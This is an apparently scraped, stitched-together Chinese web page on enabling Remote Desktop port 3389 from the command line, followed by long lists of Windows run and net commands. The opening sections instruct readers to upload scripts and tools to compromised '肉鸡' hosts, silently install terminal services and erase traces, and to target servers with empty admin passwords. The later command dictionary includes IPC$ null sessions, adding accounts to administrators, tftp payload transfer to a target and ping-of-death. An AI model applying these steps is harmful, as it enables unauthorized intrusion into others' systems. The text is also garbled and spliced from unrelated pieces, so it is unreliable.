CMD下怎么开启3389服务

打开3389端口的5种方法:
1，打开记事本，编辑内容如下：
echo [Components] > c:\sql
echo TSEnable = on >> c:\sql
sysocmgr /i:c:\winnt\inf\sysocinf /u:c:\sql /q
编辑好后存为BAT文件，上传至肉鸡，执行。这里值得注意的是要确定winnt是否在c盘，如果在其他盘则需要改动。
2 (对xp\2000都有效) 脚本文件 本地开3389 工具:rots105
使用方法：
在命令行方式下使用windows自带的脚本宿主程序cscriptexe调用脚本，例如：
c:\>cscript ROTSvbs <目标IP> <用户名> <密码> [服务端口] [自动重起选项]
服务端口： 设置终端服务的服务端口。默认是3389。
自动重起选项： 使用/r表示安装完成后自动重起目标使设置生效。
使用/fr表示强制重起目标。（如果/r不行，可以试试这个）
使用此参数时，端口设置不能忽略。
比如扫描到了一个有NT弱口令的服务器，IP地址是222222222222，管理员帐户是administrator，密码为空
运行CMD（2000下的DOS），我们给它开终端！
命令如下！
cscript regvbe 222222222222 administrator "" 3389 /fr
上面的命令应该可以理解吧？cscript regvbe这是命令，后面的是IP，然后是管理员帐户，接这是密码，因为222222222222 这台服务器的管理员密码是空的，那就用双引号表示为空，再后面是端口，你可以任意设置终端的端口，/fr是重启命令（强制重启，一般我都用这个，你也可以 /r，这是普通重启）
脚本会判断目标系统类型，如果不是server及以上版本，就会提示你是否要取消。
因为pro版不能安装终端服务。
如果你确信脚本判断错误，就继续安装好了。
如果要对本地使用，IP地址为127001或者一个点（用表示），用户名和密码都为空（用""表示）。
脚本访问的目标的135端口，如果目标135端口未开放，或者WMI服务关闭，那么脚本就没用了。
3，下载3389自动安装程序-djshao正式版50
说明：
解压djshao50zip,用你的随便什么方法把把解压出来的djxyxsexe上传到肉鸡的c:\winnt\temp下，然后进入 c:\winnt\temp目录执行djxyxsexe解压缩文件，然后再执行解压缩出来的azzdexe文件，等一会肉鸡会自动重启！重启后会出现终端服务！
特点：1、不用修改注册表的安装路径，注册表会自动修改，安装完后会自动恢复到原来的安装路径，2、在后台安静模式运行，就算肉鸡旁有人也没有关系！3、在添加和删除中看不出终端服务被安装的痕迹，也就是启动终端前不会打钩，4、不会在肉鸡上留下你的上传文件，在安装完终端服务后会会自动删除你上传到c:\winnt\temp下的任何文件！5、不管肉鸡的winnt装在什么盘上都无所谓！6、安装完终端后会删除在管理工具中的终端快捷图标！7、在没有安装终端前，终端服务是被禁止的！安装终端后，终端服务被改为自动！但是如果在安装前终端服务是手动！安装后就可能还是手动！等重启后就不会打开服务！所以在软件中加了sc指令，等安装完后，不管终端服务是禁止还是手动还是自动，全部改为自动。8、自动检测肉鸡是不是服务器版，如果不是删除原文件，不执行安装，如果是服务器版就执行安装！9、支持中日韩繁四个版本的win2000服务器版！
5，下载DameWare NT Utilities 36600 注册版
安装注册完毕后输入对方IP用户名密码，等待出现是否安装的对话框点是。
复制启动后出现对方桌面。
在对方桌面进入控制面版，点添加或删除程序。进入后点添加/删除windows组件，找到终端服务，点际进入后在启动终端服务上打上勾。确定自动提示重起，重起后OK

一句两句是说不清楚的
。给你点DOS攻击命令
只自己看下。以下复制+粘贴net
use
\\ip\ipc$
"
"
/user:"
"
建立IPC空链接
网管联盟bitsCN_com
net
use
\\ip\ipc$
"密码"
/user:"用户名"
建立IPC非空链接
网管联盟bitsCN@com
net
use
h:
\\ip\c$
"密码"
/user:"用户名"
直接登陆后映射对方C：到本地为H:
网管网>

1、打开cmd命令行，在cmd命令行下输入：tasklist/svc在输出的内容中查找svchostexe进程下termservice服务对应的PID，在此查看的PID为：1336

2、然后输入命令：netstat-ano找到对应PID就能找到对应远程端口，在此远程端口为3389端口

3、如此方式不可用，可在注册表中查看：在运行框中输入：regedit打开注册表，找到以下路径中的PortNumber文件，双击选择十进制可查看或修改端口。

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\Wds\rdpwd\Tds\tcp\PortNumber]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp\PortNumber]

4、在此将远程端口修改为33899，使用tasklist/svc查看PID，因主机重启过，在此查看对应PID为：1260。

5、使用netstat-ano查看对应端口，在此找到对应的端口为修改后的端口33899。

6、远程测试成功如图：

在Windows Server 2016中,在命令提示符窗口输入以下命令,可以打开服务器管理器并部署IIS服务:servermanagerexe服务器管理器是Windows Server 2016的服务器管理控制台,可以用来添加或删除功能、管理本地和远程服务器等。输入servermanagerexe命令后,会打开服务器管理器窗口。然后可以进行以下步骤部署IIS Web服务器:1 在服务器管理器左边窗格中,点击“添加角色和功能”链接。2 在“添加角色和功能”向导中,点击“下一步”按钮直到“服务器角色”屏幕。3 在“服务器角色”屏幕中,选中“Web服务器(IIS)”复选框。4 点击“添加功能”按钮,添加相关管理工具和IIS管理控制台。5 点击“下一步”,在“选择角色服务”屏幕选择需要安装的IIS组件,推荐选择“运行时版”或“完整版”。6 点击“下一步”按照向导继续进行,直至完成。7 安装完成后,IIS服务会被启用,网站默认目录为%SystemDrive%\inetpub\>winver 检查Windows版本
wmimgmtmsc 打开Windows管理体系结构(wmi)
wupdmgr Windows更新程序
wscript Windows脚本宿主设置
write 写字板
winmsd 系统信息
wiaacmgr 扫描仪和照相机向导
winchat xp自带局域网聊天
memexe 显示内存使用情况
msconfigexe 系统配置实用程序
mplayer2 简易widnows media player
mspaint 画图板
mstsc 远程桌面连接
mplayer2 媒体播放机
magnify 放大镜实用程序
mmc 打开控制台
mobsync 同步命令
dxdiag 检查directx信息
drwtsn32 系统医生
devmgmtmsc 设备管理器
dfrgmsc 磁盘碎片整理程序
diskmgmtmsc 磁盘管理实用程序
dcomcnfg 打开系统组件服务
ddeshare 打开dde共享设置
dvdplay dvd播放器
net stop messenger 停止信使服务
net start messenger 开始信使服务
notepad 打开记事本
nslookup 网络管理的工具向导
ntbackup 系统备份和还原
narrator 屏幕“讲述人”
ntmsmgrmsc 移动存储管理器
ntmsoprqmsc 移动存储管理员 *** 作请求
netstat -an （tc）命令检查接口
syncapp 创建一个公文包
sysedit 系统配置编辑器
sigverif 文件签名验证程序
sndrec32 录音机
shrpubw 创建共享文件夹
secpolmsc 本地安全策略
syskey 系统加密，一旦加密就不能解开，保护Windows xp系统的双重密码
servicesmsc 本地服务设置
sndvol32 音量控制程序
sfcexe 系统文件检查器
sfc /scannow windows文件保护 tsshutdn 60秒倒计时关机命令
tourstart xp简介（安装完成后出现的漫游xp程序）
taskmgr 任务管理器
eventvwr 事件查看器
eudcedit 造字程序
explorer 打开资源管理器
packager 对象包装程序
perfmonmsc 计算机性能监测程序
progman 程序管理器
regeditexe 注册表
rsopmsc 组策略结果集
regedt32 注册表编辑器
rononce -p 15秒关机
regsvr32 /u dll 停止dll文件运行
regsvr32 /u zipfldrdll 取消zip支持
cmdexe cmd命令提示符
chkdskexe chkdsk磁盘检查
certmgrmsc 证书管理实用程序
calc 启动计算器
charmap 启动字符映射表
cliconfg sql server 客户端网络实用程序
clipbrd 剪贴板查看器
conf 启动netmeeting
compmgmtmsc 计算机管理
cleanmgr 垃圾整理
ciadvmsc 索引服务程序
osk 打开屏幕键盘
odbcad32 odbc数据源管理器
oobe/msoobe /a 检查xp是否激活
lusrmgrmsc 本机用户和组
logoff 注销命令
iexpress 木马捆绑工具，系统自带
nslookup ip地址侦测器
fsmgmtmsc 共享文件夹管理器
utilman 辅助工具管理器
gpeditmsc 组策略
以下为Windows *** 作系统的常用运行命令,执行这些命令,就能打开系统对应的相关实用程序,如果大家能基本利用,就能检查并修复系统的最基本的故障,除注销,关闭系统命令外,其它所有命令,大家不妨一试!!
运行\输入CMD\输入 对应的相关实用程序:
打开C:＼Documents and Settings＼XXX(当前登录Windows XP的用户名)
打开Windows XP所在的盘符下的Documents and Settings文件夹
打开“我的电脑”选项。
accwizexe 辅助工具向导
actmovieexe 直接显示安装工具
appendexe 允许程序打开制定目录中的数据
arpexe 显示和更改计算机的IP与硬件物理地址的对应列表
atexe 计划运行任务
atmadmexe ATM调用管理器统计
attribexe 显示和更改文件和文件夹属性
autochkexe 检测修复文件系统 (XP不可用)
autoconvexe 在启动过程中自动转化系统 (XP不可用)
autofmtexe 在启动过程中格式化进程 (XP不可用)
autolfnexe 使用长文件名格式 (XP不可用)
arpexe 显示和更改计算机的IP与硬件物理地址的对应
calcexe 计算器
Bootvrfyexe 通报启动成功
caclsexe 显示和编辑ACL
cdplayerexe CD播放器
changeexe 与终端服务器相关的查询 (XP不可用)
charmapexe 字符映射表
chglogonexe 启动或停用会话记录 (XP不可用)
chgportexe 改变端口（终端服务） (XP不可用)
chgusrexe 改变用户（终端服务） (XP不可用)
chkdskexe 磁盘检测程序
chkntfsexe NTFS磁盘检测程序
cidaemonexe 组成Ci文档服务
cipherexe 在NTFS上显示或改变加密的文件或目录
cisvcexe 打开索引内容
ckcnvexe 变换Cookie
cleanmgrexe 磁盘清理
cliconfgexe SQL客户网络工具
clipbrdexe 剪贴簿查看器
clipsrvexe 运行Clipboard服务
clspackexe 建立系统文件列表清单
clusterexe 显示域的集群 (XP不可用)
cmdexe 进2000\XP DOS
cmdl32exe 自动下载连接管理
cmmgr32exe 连接管理器
cmmon32exe 连接管理器监视
cmstpexe 连接管理器配置文件安装程序
comclustexe 集群
compexe 比较两个文件和文件集的内容
conf 启动netmeeting聊天工具
control userpasswords2 XP密码管理
compmgmtmsc 计算机管理
cprofileexe 转换显示模式 (XP不可用)
开始,运行,输入CMD\输入net config workstation计算机名 \完整的计算机名\用户名
工作站处于活动状态（即网络描述） \软件版本（即软件版本号） \工作站域 工作站域的 DNS 名称
登录域 \COM 打开时间超时（秒） \COM 发送量（字节） \COM 发送超时 (msec)
CMD\输入net config workstation 更改可配置工作站服务设置。
CMD\输入net config server 可以显示不能配置的下服务器计算机名 \服务器注释 \服务器版本（即软件版本号）
服务器处于活动状态（即网络描述） \服务器处于隐藏状态（即 /hidden 设置）
最大登录用户数（即可使用服务器共享资源的最大用户数）
每个会话打开文件的最大数（即用户可在一个会话中打开服务器文件的最大数）
空闲会话时间（最小值）
chkdskexe 磁盘检查
Chkdsk /r 2000命令控制台中的Chkdsk /r命令检查修复系统文件
cleanmgr 垃圾整理
Clipbrd 剪贴板查看器
C:bootini 打开启动菜单
compactexe 显示或改变NTFS分区上文件的压缩状态
conimeexe IME控制台
controlexe 控制面板
convertexe NTFS 转换文件系统到NTFS
convlogexe 转换IIS日志文件格式到NCSA格式
cprofileexe 转换显示模式
cscriptexe 较本宿主版本
csrssexe 客户服务器Runtime进程 (XP不可用)
csvdeexe 格式转换程序 (XP不可用)
dcpromo 活动目录安装(XP不可用)
drwtsn32 系统医生
diskmgmtmsc 磁盘管理器(和PowerQuest PartitionMagic 80)
dvdplay DVD 播放器
devmgmtmsc 设备管理器(检查电脑硬件,驱动)
dxdiag 检查DirectX信息
dcomcnfgexe DCOM配置属性 (控制台根目录)
dcpromoexe 安装向导 (XP不可用)
ddeshareexe DDE共享
debugexe 检查DEBUG
dfrgfatexe FAT分区磁盘碎片整理程序
dfrgntfsexe NTFS分区磁盘碎片整理程序 (XP不可用)
dfs_cmd_exe 配置DFS树 (XP不可用)
dfsinitexe 分布式文件系统初始化(XP不可用)
dfssvcexe 分布式文件系统服务器 (XP不可用)
diantzexe 制作CAB文件
diskperfexe 磁盘性能计数器
dmremoteexe 磁盘管理服务的一部分 (XP不可用)
doskeyexe 命令行创建宏
dosxexe DOS扩展
dplaysvrexe 直接运行帮助 (XP不可用)
drwatsonexe 华生医生错误检测
drwtsn32exe 华生医生显示和配置管理
dvdplayexe DVD播放
dxdiagexe Direct-X诊断工具
edlinexe 命令行的文本编辑
esentutlexe MS数据库工具
eudceditexe 造字程序
eventvwrexe 事件查看器
exe2binexe 转换EXE文件到二进制
expandexe 解压缩
extrac32exe 解CAB工具
fsmgmtmsc 共享文件夹
fastopenexe 快速访问在内存中的硬盘文件
faxcoverexe 传真封面编辑
faxqueueexe 显示传真队列
faxsendexe 发送传真向导
faxsvcexe 启动传真服务
fcexe 比较两个文件的不同
findexe 查找文件中的文本行
findstrexe 查找文件中的行
fingerexe 一个用户并显示出统计结果
fixmapiexe 修复MAPI文件
flattempexe 允许或者禁用临时文件目录 (XP不可用)
fontviewexe 显示字体文件中的字体
forcedosexe 强制文件在DOS模式下运行
ftpexe FTP下载
gpeditmsc 组策略
gdiexe 图形界面驱动
grpconvexe 转换程序管理员组
hostnameexe 显示机器的Hostname
Internat 输入法图标
iexpress 木马捆绑工具，系统自带
ieshwizexe 自定义文件夹向导
iexpressexe iexpress安装包
iisresetexe 重启IIS服务(未安装IIS,不可用)
internatexe 键盘语言指示器 (XP不可用)
ipconfigexe 查看IP配置
ipsecmonexe IP安全监视器
ipxrouteexe IPX路由和源路由控制程序
irftpexe 无线连接
ismservexe 安装或者删除Service Control Manager中的服务
jdbgmgrexe Java4的调试器
jetconvexe 转换Jet Engine数据库 (XP不可用)
jetpackexe 压缩Jet数据库 (XP不可用)
jviewexe Java的命令行装载者
labelexe 改变驱动器的卷标
lcwizexe 许可证向导 (XP不可用)
ldifdeexe LDIF目录交换命令行管理 (XP不可用)
licmgrexe 终端服务许可协议管理 (XP不可用)
lightsexe 显示连接状况 (XP不可用)
llsmgrexe Windows 2000 许可协议管理 (XP不可用)
llssrvexe 启动许可协议服务器 (XP不可用)
locatorexe RPC Locator 远程定位
lodctrexe 调用性能计数
logoffexe 注销当前用户
lpqexe 显示远端的LPD打印队列的状态，显示被送到基于Unix的服务器的打印任务
lprexe 用于Unix客户打印机将打印任务发送给连接了打印设备的NT的打印机服务器。
lsassexe 运行LSA和Server的DLL
lserverexe 指定默认Server新的DNS域 (XP不可用)
lusrmgrmsc 本地账户管理
mmc 控制台
mplayer2 播放器
macfileexe 管理MACFILES (XP不可用)
magnifyexe 放大镜
makecabexe 制作CAB文件
memexe 显示内存状态
migpwdexe 迁移密码
mmcexe 控制台
mnmsrvcexe 远程桌面共享
mobsyncexe 同步目录管理器
mountvolexe 创建、删除或列出卷的装入点。
mplay32exe Media Player 媒体播放器
mpnotifyexe 通知应用程序
mqbkupexe 信息队列备份和恢复工具
mqmigexe MSMQ Migration Utility 信息队列迁移工具
mrinfoexe 使用SNMP多点传送路由
mscdexntexe 安装MSCD
msdtcexe 动态事务处理控制台
msgexe 发送消息到本地或远程客户
mshtaexe HTML应用程序主机
msiexecexe 开始Windows安装程序
mspaintexe 打开画图板
mstaskexe 任务计划表程序
mstinitexe 任务计划表安装
Msconfigexe 系统配置实用程序 (配置启动选项,服务项)
memexe 显示内存使用情况
mspaint 画图板
Net Stop Messenger 停止信使服务
Net Start Messenger 恢复信使服务
nslookup 网络管理的工具
Nslookup IP 地址侦测器
ntbackup 系统备份和还原
nbtstatexe 使用 NBT（TCP/IP 上的 NetBIOS）显示协议统计和当前 TCP/IP 连接。
nddeapirexe NDDE API服务器端
netshexe 用于配置和监控 Windows 2000 命令行脚本接口(XP不可用)
netstatexe 显示协议统计和当前的 TCP/IP 网络连接。
nlsfuncexe 加载特定国家的信息。Windows 2000 和 MS-DOS 子系统不使用该命令接受该命令只是为了与 MS-DOS 文件兼容。
notepadexe 打开记事本
nslookupexe 该诊断工具显示来自域名系统 (DNS) 名称服务器的信息。
ntbackupexe 备份和故障修复工具
ntfrsexe NT文件复制服务 (XP不可用)
ntvdmexe 模拟16位Windows环境
nw16exe NetWare转向器
nwscriptexe 运行Netware脚本
odbcad32exe 32位ODBC数据源管理 (驱动程序管理)
odbcconfexe 命令行配置ODBC驱动和数据源
packagerexe 对象包装程序
pathpingexe 包含Ping和Tracert的程序
pentntexe 检查Pentium的浮点错误
perfmonexe 系统性能监视器
pingexe 验证与远程计算机的连接
posixexe 用于兼容Unix
printexe 打印文本文件或显示打印队列的内容。
progmanexe 程序管理器
psxssexe Posix子系统应用程序
qappsrvexe 在网络上显示终端服务器可用的程序
qprocessexe 在本地或远程显示进程的信息（需终端服务）
queryexe 查询进程和对话 (XP不可用)
quserexe 显示用户登陆的信息（需终端服务）
qwinstaexe 显示终端服务的信息
rononce -p 15秒关机
rasAdmin 远程访问服务
regeditexe 注册表编辑器
rasadminexe 启动远程访问服务 (XP不可用)
rasautouexe 建立一个RAS连接
rasdialexe 宽带,拨号连接
rasexe 运行RAS连接 (XP不可用)
rcpexe 计算机和运行远程外壳端口监控程序 rshd 的系统之间复制文件
rdpclipexe 终端和本地复制和粘贴文件
recoverexe 从坏的或有缺陷的磁盘中恢复可读取的信息。
redirexe 运行重定向服务
regedt32exe 32位注册服务
reginiexe 用脚本修改注册许可
regwizexe 注册向导
replaceexe 用源目录中的同名文件替换目标目录中的文件。
rexecexe rexec 命令在执行指定命令前，验证远程计算机上的用户名，只有安装了 TCP/IP 协议后才可以使用该命令。
risetupexe 运行远程安装向导服务 (XP不可用)
routeexe 控制网络路由表
rshexe 在运行 RSH 服务的远程计算机上运行命令
rsnotifyexe 远程存储通知回显
runasexe 允许用户用其他权限运行指定的工具和程序
rundll32exe 启动32位DLL程序
rwinstaexe 重置会话子系统硬件和软件到最初的值
Sndvol32 音量控制程序
sfcexe 或CMD\ sfcexe 回车 系统文件检查器
servicesmsc 网络连接服务
syskey 系统加密，(一旦加密就不能解开，保护windows xp系统的双重密码wupdmgr WIDNOWS UPDATE)
SCANREG/RESTORE 命令恢复最近的注册表
seceditexe 自动化安全性配置管理
servicesexe 控制所有服务
sethcexe 设置高对比
setverexe 设置 MS-DOS 子系统向程序报告的 MS-DOS 版本号
sfcexe 系统文件检查
shadowexe 监控另外一台中端服务器会话
shrpubwexe 建立和共享文件夹
sigverifexe 文件签名验证
smlogsvcexe 性能日志和警报 (XP不可用)
sndrec32exe 录音机
sndvol32exe 显示声音控制信息
snmpexe 简单网络管理协议 (XP不可用)
snmptrapexe SNMP工具 (XP不可用)
srvmgrexe 服务器管理器 (XP不可用)
substexe 将路径与驱动器盘符关联
syseditexe 系统配置编辑器
syskeyexe NT账号数据库加密工具
sysocmgrexe > Windows 安装程序
systrayexe 在低权限运行systray
taskmgr 任务管理器
tasklist /svc(CMD)了解每个SVCHOST进程到底提供了多少系统服务(2000\98不可用)
tlist -S(CMD) 了解每个SVCHOST进程到底提供了多少系统服务(
taskmanexe 任务管理器 (XP不可用)
taskmgrexe 任务管理器
tcmsetupexe 电话服务客户安装
tcpsvcsexe TCP服务
termsrvexe 终端服务
tftpexe 将文件传输到正在运行 TFTP 服务的远程计算机或从正在运行 TFTP 服务的远程计算机传输文件
themesexe 桌面主题 (XP不可用)
tlntadmnexe Administrator Telnet服务管理
tlntsessexe 显示目前的Telnet会话
tlntsvrexe 开始Telnet服务
tracertexe 诊断实用程序将包含不同生存时间 (TTL) 值的 Internet 控制消息协议 (ICMP) 回显数据包发送到目标，以决定到达目标采用的路由
tsadminexe Administrator 终端服务管理器 (XP不可用)
tsconexe 粘贴用户会话到终端对话
tsdisconexe 断开终端服务的用户
tskillexe 杀掉终端服务
tsprofexe 用终端服务得出查询结果
tsshutdnexe 关闭系统
unlodctrexe 性能监视器的一部分
upg351dbexe 升级Jet数据库 (XP不可用)
upsexe UPS service UPS服务
userexe Windows核心服务
userinitexe 打开我的文档
usrmgrexe 域用户管理器
utilmanexe 指定2000启动时自动打开那台机器
vwipxspxexe 调用IPX/SPX VDM
w32tmexe 时间服务器
wextractexe 解压缩Windows文件
winchatexe 打开Windows聊天工具
winhlp32exe 运行帮助系统
winmsdexe 查看系统信息
winverexe 显示Windows版本
wizmgrexe Windows管理向导 (XP不可用)
wjviewexe Java 命令行调用Java
writeexe 打开写字板
wscriptexe 脚本工具
wupdmgrexe Windows update 运行Windows update升级向导
winver 检查Windows版本
Win98系统工具
开始,运行,输入Msconfig 系统配置实用工具 配置启动选项，包括configsys、autoexecbat、winini、systemini和注册表及程序菜单中的启动项。并可设置是否故障启动。
开始,运行,输入Regedit 注册表修改工具 注册表编辑器，如果没有把握不要随意修改注册表！
开始,运行,输入Regsvr32 dll注册工具 当提示找不到dll文件时，可用此来注册该动态连接库。
开始,运行,输入Regwiz 注册向导 用于注册。校验系统文件，并可恢复系统文件。
如果启动时出现类似vxd文件错误，可用此恢复该vxd文件。
开始,运行,输入Scandskw 磁盘扫描程序,用于扫描修复磁盘。如果磁盘或文件出现错误，可用来初步修复。
开始,运行,输入DxDiag DirectX诊断工具可用于检测DirectX运行是否正常。
开始,运行,输入NETSCAPE
ESC：清除当前命令行；
F7：显示命令历史记录，以图形列表窗的形式给出所有曾经输入的命令，并可用上下箭头键选择再次执行该命令。
F8：搜索命令的历史记录，循环显示所有曾经输入的命令，直到按下回车键为止；
F9：按编号选择命令，以图形对话框方式要求您输入命令所对应的编号(从0开始)，并将该命令显示在屏幕上；
Ctrl+H：删除光标左边的一个字符；
Ctrl+C Ctrl+Break，强行中止命令执行；
Ctrl+M：表示回车确认键；
Alt+F7：清除所有曾经输入的命令历史记录；
Alt+PrintScreen：截取屏幕上当前命令窗里的内容。
病毒破坏了系统文件，请使用杀毒软件查杀病毒，然后利用Windows 2000提供的“命令控制台”中的Chkdsk /r命令检查修复系统文件即可
DOS命令字典收藏
net use \ip\ipc$ " " /user:" " 建立IPC空链接
net use \ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接
net use h: \ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C：到本地为H:
net use h: \ip\c$ 登陆后映射对方C：到本地为H:
net use \ip\ipc$ /del 删除IPC链接
net use h: /del 删除映射对方到本地的为H:的映射
net user 用户名 密码 /add 建立用户
net user guest /active:yes 激活guest用户
net user 查看有哪些用户
net user 帐户名 查看帐户的属性
net localgroup istrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意：istrator后加s用复数
net start 查看开启了哪些服务
net start 服务名 开启服务；(如:net start telnet， net start schedule)
net stop 服务名 停止某服务
net time \目标ip 查看对方时间
net time \目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息
net view 查看本地局域网内开启了哪些共享
net view \ip 查看对方局域网内开启了哪些共享
net config 显示系统网络设置
net logoff 断开连接的共享
net pause 服务名 暂停某服务
net send ip "文本信息" 向对方发信息
net ver 局域网内正在使用的网络连接类型和信息
net share 查看本地开启的共享
net share ipc$ 开启ipc
net share ipc$ /del 删除ipc
net share c$ /del 删除C：共享
net user guest 12345 用guest用户登陆后用将密码改为12345
net password 密码 更改系统登陆密码
netstat -a 查看开启了哪些端口,常用netstat -an
netstat -n 查看端口的网络连接情况，常用netstat -an
netstat -v 查看正在进行的工作
netstat -p 协议名 例：netstat -p tcq/ip 查看某协议使用情况（查看tcp/ip协议使用情况）
netstat -s 查看正在使用的所有协议使用情况
nbtstat -A ip 对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名（03前的为用户名）-注意：参数-A要大写
tracert -参数 ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”用于设置超时间隔。
ping ip(或域名) 向对方主机发送默认大小为32字节的数据，参数：“-l[空格]数据包大小”；“-n发送数据次数”；“-t”指一直ping。
ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)
ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用参数“/all”显示全部配置信息
tlist -t 以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)
kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)
del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件，/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR ”表示删除当前目录下所有只读文件，“DEL/A-S ”表示删除当前目录下除系统文件以外的所有文件
move 盘符\路径\要移动的文件名 存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖
fc onetxt twotxt > 3sttxt 对比二个文件并把不同之处输出到3sttxt文件中，"> "和"> >" 是重定向命令
at id号 开启已注册的某个计划任务
at /delete 停止所有计划任务，用参数/yes则不需要确认就直接停止
at id号 /delete 停止某个已注册的计划任务
at 查看所有的计划任务
at \ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机
finger username @host 查看最近有哪些用户登陆
telnet ip 端口 远和登陆服务器,默认端口为23
open ip 连接到IP（属telnet登陆后的命令）
telnet 在本机上直接键入telnet 将进入本机的telnet
copy 路径\文件名1 路径\文件名2 /y 复制文件1到指定的目录为文件2，用参数/y就同时取消确认你要改写一份现存目录文件
copy c:\srvexe \ip\$ 复制本地c:\srvexe到对方的下
cppy 1stjpg/b+2sttxt/a 3stjpg 将2sttxt的内容藏身到1stjpg中生成3stjpg新的文件，注：2sttxt文件头要空三排，参数：/b指二进制文件，/a指ASCLL格式文件
copy \ip\$\svvexe c:\ 或:copy\ip\$\ 复制对方iexe文件（所有文件）至本地C：
xcopy 要复制的文件或目录树 目标地址\目录名 复制文件和目录树，用参数/Y将不提示覆盖相同文件
tftp -i 自己IP(用肉机作跳板时这用肉机IP) get serverexe c:\serverexe 登陆后，将“IP”的serverexe下载到目标主机c:\serverexe 参数：-i指以二进制模式传送，如传送exe文件时用，如不加-i 则以ASCII模式（传送文本文件模式）进行传送
tftp -i 对方IP put c:\serverexe 登陆后，上传本地c:\serverexe至主机
ftp ip 端口 用于上传文件至服务器或进行文件 *** 作，默认端口为21。bin指用二进制方式传送（可执行文件进）；默认为ASCII格式传送(文本文件时)
route print 显示出IP路由，将主要显示网络地址Network addres，子网掩码Netmask，网关地址Gateway addres，接口地址Interface
arp 查看和处理ARP缓存，ARP是名字解析的意思，负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息
start 程序名或命令 /max 或/min 新开一个新窗口并最大化（最小化）运行某程序或命令
mem 查看cpu使用情况
attrib 文件名(目录名) 查看某文件（目录）的属性
attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档，只读，系统，隐藏 属性；用＋则是添加为某属性
dir 查看文件，参数：/Q显示文件及目录属系统哪个用户，/T:C显示文件创建时间，/T:A显示文件上次被访问时间，/T:W上次被修改时间
date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间，而不必输入新日期和时间
set 指定环境变量名称=要指派给变量的字符 设置环境变量
set 显示当前所有的环境变量
set p(或其它字/ca>

---